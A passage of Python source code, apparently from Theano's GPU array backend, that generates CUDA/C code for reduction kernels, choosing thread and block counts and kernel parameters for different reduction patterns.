in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
if getattr(self.scalar_op, 'identity', None) == 0:
zero_shp = "GpuArray_memset(&%(z)s->ga, 0)" % locals()
# TODO: elif getattr(self.scalar_op, 'identity', None) == 1:
else:
zero_shp = """
PyErr_Format(PyExc_NotImplementedError,
"GpuCAReduceCuda not implemented when input shape is 0 for this scalar_op");
%(fail)s;
""" % locals()
acc_dtype = "npy_" + self._acc_dtype(node.inputs[0].dtype)
k_var = "kernel_reduce_ccontig_%(name)s" % locals()
err_check = """
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(k_var)s: %%s.",
GpuKernel_error(&%(k_var)s, err));
%(fail)s;
}
""" % locals()
sync = ""
if config.gpuarray.sync:
sync = """
err = GpuArray_sync(&%(z)s->ga);
%(err_check)s
""" % locals()
print("""
{
if(PyGpuArray_SIZE(%(x)s)==0){
%(zero_shp)s;
}else{
int verbose = 0;
size_t numEls = PyGpuArray_SIZE(%(x)s);
size_t n_threads = std::min(numEls, (size_t) 256);
size_t n_blocks = 1;
void *kernel_params[] = {(void *)&numEls,
(void *)%(x)s->ga.data,
(void *)&%(x)s->ga.offset,
(void *)%(z)s->ga.data,
(void *)&%(z)s->ga.offset};
if (verbose) printf("running kernel_reduce_ccontig_%(name)s"
" n_threads=%%llu, size=%%llu, ndim=%%u\\n",
n_threads, numEls,
PyGpuArray_NDIM(%(x)s));
size_t n_shared = sizeof(%(acc_dtype)s) * n_threads;
int err = GpuKernel_call(&%(k_var)s, 1, &n_threads, &n_blocks, n_shared, kernel_params);
%(err_check)s
%(sync)s
}
}
""" % locals(), file=sio)
def c_code_reduce_1(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t) 256), 1, 1};
size_t n_blocks[3] = {1, 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_11(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[1], (size_t) 256), 1, 1};
while (n_threads[1] * n_threads[0] <= 256) ++n_threads[1];
n_threads[1] -= 1;
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[0])
n_threads[1] = PyGpuArray_DIMS(%(x)s)[0];
size_t n_blocks[3] = {1, 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_01X(self, sio, node, name, x, z, fail, N):
"""
Parameters
----------
N
The number of 1 in the pattern N=1 -> 01, N=2 -> 011 N=3 ->0111
Work for N=1,2,3.
"""
assert N in [1, 2, 3]
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
makecall = self._makecall(node, name, x, z, fail)
N_pattern = ''.join(['1'] * N)
param_dim = ",".join(["PyGpuArray_DIMS(%s)[%d]" % (x, i)
for i in xrange(N + 1)])
strides_dim = ",".join(["PyGpuArray_STRIDES(%s)[%d]/sizeof(%s)"
% (x, i, in_dtype) for i in xrange(N + 1)])
threads_y = """
//get as many y threads as we can fit
while (n_threads[0] * (n_threads[1]+1) <= 256)
{
if (n_threads[1] < PyGpuArray_DIMS(%(x)s)[%(N)s-1])
n_threads[1] += 1;
else
break;
}""" % locals()
threads_z = """
//get as many z threads as we can fit
while (n_threads[0] * n_threads[1] * (n_threads[2]+1) <= 256)
{
if (n_threads[2] < PyGpuArray_DIMS(%(x)s)[%(N)s-2])
n_threads[2] += 1;
else
break;
}
//Maximum for Fermi GPU on that dimensions.
n_threads[2] = std::min(n_threads[2], (size_t)64);
""" % locals()
if len(self.reduce_mask) == 2:
threads_y = ''
threads_z = ''
if len(self.reduce_mask) == 3:
threads_z = ''
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[%(N)s], (size_t) 256), 1, 1};
%(threads_y)s
%(threads_z)s
size_t n_blocks[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t) 4096), 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_01(self, sio, node, name, x, z, fail):
self.c_code_reduce_01X(sio, node, name, x, z, fail, 1)
def c_code_reduce_011(self, sio, node, name, x, z, fail):
self.c_code_reduce_01X(sio, node, name, x, z, fail, 2)
def c_code_reduce_0111(self, sio, node, name, x, z, fail):
self.c_code_reduce_01X(sio, node, name, x, z, fail, 3)
def c_code_reduce_10(self, sio, node, name, x, z, fail):
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
acc_dtype = "npy_" + self._acc_dtype(node.inputs[0].dtype)
k_var = "kernel_reduce_10_%(name)s" % locals()
err_check = """
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(k_var)s: %%s.",
GpuKernel_error(%(k_var)s, err));
%(fail)s;
}
""" % locals()
sync = ""
if config.gpuarray.sync:
sync = """
err = GpuArray_sync(&%(z)s->ga);
%(err_check)s
""" % locals()
print("""
{
int verbose = 0;
if(PyGpuArray_STRIDES(%(x)s)[0]>
PyGpuArray_STRIDES(%(x)s)[1]){
// If there are a lot of summations to do, then we can use simple parallelization -
// use each thread to do one sum.
// we might as well launch blocks of 32 threads because that's the warp size.
// we could schedule more threads if we were maxing out the gridsize below, but
// the gridsize is way more than the physical hardware and I think 32 threads
// on a huge grid is enough to fully use the hardware.
size_t n_threads[3] = {32, 1, 1};
// We kindof reshape the input implicitly to something 4D:
// the shape A,B,C -> A, B, D, E
// where C <= D*E < C+32
// where E==32
GpuKernel *%(k_var)s = &kernel_reduce_010_AD_%(name)s;
size_t A = 1;
size_t B = PyGpuArray_DIMS(%(x)s)[0];
size_t C = PyGpuArray_DIMS(%(x)s)[1];
size_t D = C/32;
if (32*D < C) D+= 1;
assert ((C <= 32*D) && (32*D < C+32));
// The gridsize would ideally be (A, D). But we do the following logic to make
// sure we don't ask for a grid that is too big.
size_t n_blocks[3] = {A, D, 1};
if (n_blocks[0] > 4096) n_blocks[0] = 4096;
if (n_blocks[0]*n_blocks[1] > 4096) n_blocks[1] = 4096/n_blocks[0];
ssize_t stride_A0 = 1;
ssize_t stride_A1 = PyGpuArray_STRIDES(%(x)s)[0]/sizeof(%(in_dtype)s);
ssize_t stride_A2 = PyGpuArray_STRIDES(%(x)s)[1]/sizeof(%(in_dtype)s);
ssize_t stride_Z0 = 1;
ssize_t stride_Z1 = PyGpuArray_STRIDES(%(z)s)[0]/sizeof(%(out_dtype)s);
void *kernel_params[] = {
(void *)&A, (void *)&B, (void *)&C, (void *)&D,
(void *)%(x)s->ga.data,
(void *)&%(x)s->ga.offset,
(void *)&stride_A0, (void *)&stride_A1, (void *)&stride_A2,
(void *)%(z)s->ga.data,
(void *)&%(z)s->ga.offset,
(void *)&stride_Z0, (void *)&stride_Z1};
int err = GpuKernel_call(%(k_var)s, 3, n_threads, n_blocks, 0, kernel_params);
%(err_check)s
%(sync)s
}else{
GpuKernel *%(k_var)s = &kernel_reduce_010_%(name)s;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t) 256), 1, 1};
size_t n_blocks[3] = {1, std::min(PyGpuArray_DIMS(%(x)s)[1], (size_t) 4096), 1};
if (verbose) {
fprintf(stderr,
"running kernel_reduce_10_%(name)s n_blocks=(%%llu,%%llu)\\n",
(unsigned long long)n_blocks[0],
(unsigned long long)n_blocks[1]);
}
assert(PyGpuArray_DIMS(%(x)s)[1] == PyGpuArray_DIMS(%(z)s)[0]);
size_t n_shared = sizeof(%(acc_dtype)s) * n_threads[0];
size_t dim_0 = 1;
ssize_t stride_A0 = 1;
ssize_t stride_A1 = PyGpuArray_STRIDES(%(x)s)[0]/sizeof(%(in_dtype)s);
ssize_t stride_A2 = PyGpuArray_STRIDES(%(x)s)[1]/sizeof(%(in_dtype)s);
ssize_t stride_Z0 = 1;
ssize_t stride_Z1 = PyGpuArray_STRIDES(%(z)s)[0]/sizeof(%(out_dtype)s);
void *kernel_params[] = {
(void *)&dim_0,
(void *)&PyGpuArray_DIMS(%(x)s)[0],
(void *)&PyGpuArray_DIMS(%(x)s)[1],
(void *)%(x)s->ga.data, (void *)&%(x)s->ga.offset,
(void *)&stride_A0, (void *)&stride_A1, (void *)&stride_A2,
(void *)%(z)s->ga.data, (void *)&%(z)s->ga.offset,
(void *)&stride_Z0, (void *)&stride_Z1};
int err = GpuKernel_call(%(k_var)s, 3, n_threads, n_blocks, n_shared, kernel_params);
%(err_check)s
%(sync)s
}
}
""" % locals(), file=sio)
def c_code_reduce_010(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
makecall_inner = self._makecall(node, name, x, z, fail,
pattern="010_inner")
pattern = ''.join(str(i) for i in self.reduce_mask)
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
k_var = "kernel_reduce_010_AD_%(name)s" % locals()
err_check = """
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(k_var)s: %%s.",
GpuKernel_error(&%(k_var)s, err));
%(fail)s;
}
""" % locals()
sync = ""
if config.gpuarray.sync:
sync = """
err = GpuArray_sync(&%(z)s->ga);
%(err_check)s
""" % locals()
print("""
{
//int n_summations = PyGpuArray_DIMS(%(x)s)[0] * PyGpuArray_DIMS(%(x)s)[2];
//if ((n_summations >= 15 * 32) && (PyGpuArray_DIMS(%(x)s)[2]>=16))
if (1) // if the alternative is less buggy, consider not using this branch
{
// If there are a lot of summations to do, then we can use simple parallelization -
// use each thread to do one sum.
// we might as well launch blocks of 32 threads because that's the warp size.
// we could schedule more threads if we were maxing out the gridsize below, but
// the gridsize is way more than the physical hardware and I think 32 threads
// on a huge grid is enough to fully use the hardware.
size_t n_threads[3] = {32, 1, 1};
// We kindof reshape the input implicitly to something 4D:
// the shape A,B,C -> A, B, D, E
// where C <= D*E < C+32
// where E==32
size_t A = PyGpuArray_DIMS(%(x)s)[0];
size_t B = PyGpuArray_DIMS(%(x)s)[1];
size_t C = PyGpuArray_DIMS(%(x)s)[2];
size_t D = C/32;
if (32*D < C) D+= 1;
assert ((C <= 32*D) && (32*D < C+32));
// The gridsize would ideally be (A, D). But we do the following logic to make
// sure we don't ask for a grid that is too big.
size_t n_blocks[3] = {A, D, 1};
if (n_blocks[0] > 4096) n_blocks[0] = 4096;
if (n_blocks[0]*n_blocks[1] > 4096) n_blocks[1] = 4096/n_blocks[0];
ssize_t stride_A0 = PyGpuArray_STRIDES(%(x)s)[0]/sizeof(%(in_dtype)s);
ssize_t stride_A1 = PyGpuArray_STRIDES(%(x)s)[1]/sizeof(%(in_dtype)s);
ssize_t stride_A2 = PyGpuArray_STRIDES(%(x)s)[2]/sizeof(%(in_dtype)s);
ssize_t stride_Z0 = PyGpuArray_STRIDES(%(z)s)[0]/sizeof(%(out_dtype)s);
ssize_t stride_Z1 = PyGpuArray_STRIDES(%(z)s)[1]/sizeof(%(out_dtype)s);
void *kernel_params[] = {
(void *)&A, (void *)&B, (void *)&C, (void *)&D,
(void *)%(x)s->ga.data,
(void *)&%(x)s->ga.offset,
(void *)&stride_A0, (void *)&stride_A1, (void *)&stride_A2,
(void *)%(z)s->ga.data,
(void *)&%(z)s->ga.offset,
(void *)&stride_Z0, (void *)&stride_Z1};
int err = GpuKernel_call(&%(k_var)s, 3, n_threads, n_blocks, 0, kernel_params);
%(err_check)s
%(sync)s
}
else
{
int verbose = 2;
size_t n_threads[3] = {std::min((size_t) 32, PyGpuArray_DIMS(%(x)s)[2]), 1, 1};
while( (n_threads[0]*(n_threads[1]+1)<=256)
&& (n_threads[1]<PyGpuArray_DIMS(%(x)s)[1])){
n_threads[1]++;
}
size_t n_blocks[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t)4096), 1, 1};
n_blocks[1] = std::min(
ceil_intdiv(PyGpuArray_DIMS(%(x)s)[2],
(size_t)n_threads[0]),
(size_t)(4096 / n_blocks[0])
);
if(std::min(std::min(PyGpuArray_STRIDES(%(x)s)[0]/sizeof(%(in_dtype)s),
PyGpuArray_STRIDES(%(x)s)[1]/sizeof(%(in_dtype)s)),
PyGpuArray_STRIDES(%(x)s)[2]/sizeof(%(in_dtype)s))
==PyGpuArray_STRIDES(%(x)s)[2]/sizeof(%(in_dtype)s)
&& n_blocks[1]==ceil_intdiv(PyGpuArray_DIMS(%(x)s)[2],
(size_t)n_threads[0])){
if(verbose>1)
printf("n_block.x.1=%%d, n_block.x.2=%%d, n_block.y.1=%%d, n_block.y.2=%%d,\\n",
PyGpuArray_DIMS(%(x)s)[0],4096,
ceil_intdiv(PyGpuArray_DIMS(%(x)s)[2],(size_t)n_threads[0]),
(size_t)(4096 / n_blocks[0]));
assert(n_threads[0]<=32);
%(makecall_inner)s
}else{
n_threads[0] = std::min(PyGpuArray_DIMS(%(x)s)[1],
(size_t) 256);
n_blocks[0] = std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t)4096);
n_blocks[1] = std::min(
PyGpuArray_DIMS(%(x)s)[2],
(size_t)(4096 / n_blocks[0])
);
%(makecall)s
}
%(sync)s
}
}
""" % locals(), file=sio)
def c_code_reduce_0101(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[3], (size_t) 256), 1, 1};
while (n_threads[0] * n_threads[1] <= 256)
{
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[1]) break;
n_threads[1] += 1;
}
n_threads[1] -= 1;
size_t n_blocks[3] = {PyGpuArray_DIMS(%(x)s)[0], PyGpuArray_DIMS(%(x)s)[2], 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_100(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
acc_dtype = "npy_" + self._acc_dtype(node.inputs[0].dtype)
k_var = "kernel_reduce_010_AD_%(name)s" % locals()
err_check = """
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(k_var)s: %%s.",
GpuKernel_error(&%(k_var)s, err));
%(fail)s;
}
""" % locals()
sync = ""
if config.gpuarray.sync:
sync = """
err = GpuArray_sync(&%(z)s->ga);
%(err_check)s
""" % locals()
# use threadIdx.x for i0
# use blockIdx.x for i1
# use blockIdx.y for i2
print("""
{
int verbose = 0;
if (PyGpuArray_STRIDES(%(x)s)[2] != sizeof(%(in_dtype)s)){
printf("slow\\n");
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t) 256), 1, 1};
size_t n_blocks[3] = {std::min(PyGpuArray_DIMS(%(x)s)[1], (size_t)4096), 1, 1};
while (n_blocks[0] * (n_blocks[1]+1) <= 4096 &&
n_blocks[1] <= PyGpuArray_DIMS(%(x)s)[2])
{
n_blocks[1] += 1;
}
%(makecall)s
}
else
{ // reuse 010_AD kernel, we transpose the 2 first dim
// See the reduction for the real 010_AD kernel for
// explanation. We do this to get coalesced read.
size_t n_threads[3] = {32, 1, 1};
size_t A = PyGpuArray_DIMS(%(x)s)[1];
size_t B = PyGpuArray_DIMS(%(x)s)[0];
size_t C = PyGpuArray_DIMS(%(x)s)[2];
size_t D = C/32;
if (32*D < C) D+= 1;
assert ((C <= 32*D) && (32*D < C+32));
// The gridsize would ideally be (A, D). But we do the following logic to make
// sure we don't ask for a grid that is too big.
size_t n_blocks[3] = {A, D, 1};
if (n_blocks[0] > 4096) n_blocks[0] = 4096;
if (n_blocks[0]*n_blocks[1] > 4096) n_blocks[1] = 4096/n_blocks[0];
size_t n_shared = 0;
ssize_t stride_A0 = PyGpuArray_STRIDES(%(x)s)[1]/sizeof(%(in_dtype)s);
ssize_t stride_A1 = PyGpuArray_STRIDES(%(x)s)[0]/sizeof(%(in_dtype)s);
ssize_t stride_A2 = PyGpuArray_STRIDES(%(x)s)[2]/sizeof(%(in_dtype)s);
ssize_t stride_Z0 = PyGpuArray_STRIDES(%(z)s)[0]/sizeof(%(out_dtype)s);
ssize_t stride_Z1 = PyGpuArray_STRIDES(%(z)s)[1]/sizeof(%(out_dtype)s);
void *kernel_params[] = {
(void *)&A, (void *)&B, (void *)&C, (void *)&D,
(void *)%(x)s->ga.data,
(void *)&%(x)s->ga.offset,
(void *)&stride_A0, (void *)&stride_A1, (void *)&stride_A2,
(void *)%(z)s->ga.data,
(void *)&%(z)s->ga.offset,
(void *)&stride_Z0, (void *)&stride_Z1};
int err = GpuKernel_call(&%(k_var)s, 3, n_threads, n_blocks, 0, kernel_params);
%(err_check)s
%(sync)s
}
}
""" % locals(), file=sio)
def c_code_reduce_110(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[1], (size_t) 256), 1, 1};
while (n_threads[0]*n_threads[1] <= 256)
{
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[0])
break;
n_threads[1] += 1;
}
n_threads[1] -= 1;
size_t n_blocks[3] = {PyGpuArray_DIMS(%(x)s)[2], 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_001(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[2], (size_t) 256), 1, 1};
size_t n_blocks[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t) 4096), 1, 1};
while (n_blocks[0] * n_blocks[1] <= 4096)
{
if (n_blocks[1] > PyGpuArray_DIMS(%(x)s)[1])
break;
n_blocks[1] += 1;
}
n_blocks[1] -= 1;
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_101(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail,
extra_dims=[("size_t one = 1;", "(void *) &one")],
extra_strides=[("ssize_t sone = 1;", "(void *) &sone")],
pattern="1011")
print("""
{
int verbose = 0;
// size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[3],
// (size_t) 256), 1, 1};
size_t n_threads[3] = {1, 1, 1};
while (n_threads[0] * (n_threads[1]+1) <= 256) ++n_threads[1];
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[2])
n_threads[1] = PyGpuArray_DIMS(%(x)s)[2];
while (n_threads[0] * n_threads[1] * (n_threads[2]+1) <= 256)
++n_threads[2];
if (n_threads[2] > 64)
n_threads[2] = 64;
if (n_threads[2] > PyGpuArray_DIMS(%(x)s)[0])
n_threads[2] = PyGpuArray_DIMS(%(x)s)[0];
size_t n_blocks[3] = {PyGpuArray_DIMS(%(x)s)[1], 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_111(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[2], (size_t) 256), 1, 1};
//get as many y threads as we can fit
while (n_threads[0] * n_threads[1] <= 256)
{
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[1])
break;
n_threads[1] += 1;
}
n_threads[1] -= 1;
//get as many z threads as we can fit
while (n_threads[0] * n_threads[1] * n_threads[2] <= 256)
{
if (n_threads[2] > PyGpuArray_DIMS(%(x)s)[0])
break;
n_threads[2] += 1;
}
n_threads[2] -= 1;
//Maximum for Fermi GPU on that dimensions.
n_threads[2] = std::min(n_threads[2], (size_t)64);
size_t n_blocks[3] = {1, 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_0011(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
acc_dtype = "npy_" + self._acc_dtype(node.inputs[0].dtype)
print("""
{
int verbose = 0;
size_t n_blocks[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t) 4096), 1, 1};
while (n_blocks[0] * n_blocks[1] <= 4096 &&
n_blocks[1] < PyGpuArray_DIMS(%(x)s)[1])
{
n_blocks[1] += 1;
}
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[3], (size_t) 256), 1, 1};
while (n_threads[0] * n_threads[1] <= 256
&& n_threads[1] < PyGpuArray_DIMS(%(x)s)[2]
&& n_threads[0] * n_threads[1] * sizeof(%(acc_dtype)s) <=(15*1024-200))
{
n_threads[1] += 1;
}
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_1111(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[2], (size_t) 256), 1, 1};
//get as many y threads as we can fit
while (n_threads[0] * n_threads[1] <= 256)
{
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[1])
break;
n_threads[1] += 1;
}
n_threads[1] -= 1;
//get as many z threads as we can fit
while (n_threads[0] * n_threads[1] * n_threads[2] <= 256)
{
if (n_threads[2] > PyGpuArray_DIMS(%(x)s)[0])
break;
n_threads[2] += 1;
}
n_threads[2] -= 1;
//Maximum for Fermi GPU on that dimensions.
n_threads[2] = std::min(n_threads[2], (size_t)64);
size_t n_blocks[3] = {1, 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_1011(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[3], (size_t) 256), 1, 1};
while (n_threads[0] * (n_threads[1]+1) <= 256) ++n_threads[1];
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[2])
n_threads[1] = PyGpuArray_DIMS(%(x)s)[2];
while (n_threads[0] * n_threads[1] * (n_threads[2]+1) <= 256) ++n_threads[2];
if (n_threads[2] > 64)
n_threads[2] = 64;
if (n_threads[2] > PyGpuArray_DIMS(%(x)s)[0])
n_threads[2] = PyGpuArray_DIMS(%(x)s)[0];
size_t n_blocks[3] = {PyGpuArray_DIMS(%(x)s)[1], 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_cache_version_apply(self, node):
version = [18] # the version corresponding to the c code in this Op
# now we insert versions for the ops on which we depend...
scalar_node = Apply(
self.scalar_op,
[Scalar(dtype=input.type.dtype)() for input in node.inputs],
[Scalar(dtype=output.type.dtype)() for output in node.outputs])
version.extend(self.scalar_op.c_code_cache_version_apply(scalar_node))
for i in node.inputs + node.outputs:
version.extend(Scalar(dtype=i.type.dtype).c_code_cache_version())
version.extend(self.kernel_version(node))
if all(version):
return tuple(version)
else:
return ()
def gpu_kernels(self, node, nodename):
nd_in = len(self.reduce_mask)
in_dtype = node.inputs[0].dtype
out_dtype = node.outputs[0].dtype
acc_dtype = self._acc_dtype(node.inputs[0].dtype)
flags = Kernel.get_flags(in_dtype, acc_dtype, out_dtype)
in_type = gpuarray.dtype_to_ctype(in_dtype)
out_type = gpuarray.dtype_to_ctype(out_dtype)
acc_type = gpuarray.dtype_to_ctype(acc_dtype)
load_in = load_w(in_dtype)
write_out = write_w(out_dtype)
kernels = []
if all(i == 1 for i in self.reduce_mask):
# this kernel is ok for up to a few thousand elements, but
# it only runs on ONE multiprocessor
reducebuf = self._k_reduce_buf('Z[0]', node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[0])")
kname = "kernel_reduce_ccontig"
k_var = "kernel_reduce_ccontig_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0,
const %(in_type)s *A, const ga_size offset_A,
%(out_type)s *Z, const ga_size offset_Z)
{
const int threadCount = blockDim.x;
const int threadNum = threadIdx.x;
extern __shared__ %(acc_type)s buf[];
%(acc_type)s myresult = %(reduce_init)s;
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int i0 = threadIdx.x; i0 < d0; i0 += blockDim.x)
{
%(reduce_fct)s
}
%(reducebuf)s
}
""" % locals(), file=sio)
params = [
'uintp',
gpuarray.GpuArray, 'uintp',
gpuarray.GpuArray, 'uintp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1,):
# this kernel is ok for up to a few thousand elements, but
# it only runs on ONE multiprocessor
reducebuf = self._k_reduce_buf('Z[0]', node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[0])")
kname = "kernel_reduce_1"
k_var = "kernel_reduce_1_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0,
const %(in_type)s *A, const ga_size offset_A,
const ga_ssize sA0,
%(out_type)s * Z, const ga_size offset_Z)
{
const int threadCount = blockDim.x;
const int threadNum = threadIdx.x;
extern __shared__ %(acc_type)s buf[];
%(acc_type)s myresult = %(reduce_init)s;
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int i0 = threadIdx.x; i0 < d0; i0 += blockDim.x)
{
%(reduce_fct)s
}
%(reducebuf)s
}
""" % locals(), file=sio)
params = [
'uintp',
gpuarray.GpuArray, 'uintp',
'intp',
gpuarray.GpuArray, 'uintp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1, 1):
# this kernel is ok for up to a few thousand elements, but
# it only runs on ONE multiprocessor
reducebuf = self._k_reduce_buf('Z[0]', node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[0])")
kname = "kernel_reduce_11"
k_var = "kernel_reduce_11_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0, const ga_size d1,
const %(in_type)s *A, const ga_size offset_A,
const ga_ssize sA0, const ga_ssize sA1,
%(out_type)s * Z, const ga_size offset_Z)
{
const int threadCount = blockDim.x * blockDim.y;
const int threadNum = threadIdx.y*blockDim.x + threadIdx.x;
extern __shared__ %(acc_type)s buf[];
%(acc_type)s myresult = %(reduce_init)s;
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int i0 = threadIdx.y; i0 < d0; i0 += blockDim.y)
{
for (int i1 = threadIdx.x; i1 < d1; i1 += blockDim.x)
{
%(reduce_fct)s;
}
}
%(reducebuf)s
}
""" % locals(), file=sio)
params = [
'uintp', 'uintp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp',
gpuarray.GpuArray, 'uintp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
# 01, 011, 0111
if (0 == self.reduce_mask[0] and
all(self.reduce_mask[1:]) and
nd_in in[2, 3, 4]):
# this kernel uses one block for each row.
# threads per block for each element per row.
N_pattern = ''.join(['1'] * (nd_in - 1))
# TODO: is it faster to hardcode sA3, etc. in the later
# code, rather than have the for_* variables declare them
# and the later code use their names?
if nd_in == 2:
for_i1 = "for (int i1 = threadIdx.x; i1 < d1; i1 += blockDim.x)"
first_i1 = 'threadIdx.x'
sA1 = 'sA1'
for_i2 = "int i2=0, sA2=0;"
sA2 = '0'
first_i2 = '0'
for_i3 = "int i3=0, sA3=0;"
sA3 = '0'
first_i3 = '0'
if nd_in == 3:
for_i1 = "for (int i1 = threadIdx.y; i1 < d1; i1 += blockDim.y)"
first_i1 = 'threadIdx.y'
sA1 = 'sA1'
for_i2 = "for (int i2 = threadIdx.x; i2 < d2; i2 += blockDim.x)"
first_i2 = 'threadIdx.x'
sA2 = 'sA2'
for_i3 = "int i3=0, sA3=0;"
first_i3 = 0
sA3 = '0'
if nd_in == 4:
for_i1 = "for (int i1 = threadIdx.z; i1 < d1; i1 += blockDim.z)"
first_i1 = 'threadIdx.z'
sA1 = 'sA1'
for_i2 = "for (int i2 = threadIdx.y; i2 < d2; i2 += blockDim.y)"
first_i2 = 'threadIdx.y'
sA2 = 'sA2'
for_i3 = "for (int i3 = threadIdx.x; i3 < d3; i3 += blockDim.x)"
first_i3 = 'threadIdx.x'
sA3 = 'sA3'
reducebuf = self._k_reduce_buf('Z[i0 * sZ0]', node,
nodename, sub={})
param_dim = ",".join(["const ga_size d%d" % i
for i in xrange(nd_in)])
param_strides = ",".join(["const ga_ssize sA%d" % i
for i in xrange(nd_in)])
decl, kname, params, k_var = self._k_decl(node, nodename)
init = self._k_init(node, nodename)
reduce_init = self._assign_init(load_in + "(A[%(first_i3)s * %(sA3)s + %(first_i2)s * %(sA2)s + %(first_i1)s * %(sA1)s + i0 * sA0])" % locals())
reduce_fct = self._assign_reduce(
node, nodename, "myresult",
load_in + "(A[i3 * sA3 + i2 * sA2 + i1 * sA1 + i0 * sA0])",
{}, True)
sio = StringIO()
print("""
%(decl)s{
%(init)s
for (int i0 = blockIdx.x; i0 < d0; i0 += gridDim.x){
myresult = %(reduce_init)s;
%(for_i1)s{
%(for_i2)s{
%(for_i3)s{
%(reduce_fct)s;
}
}
}
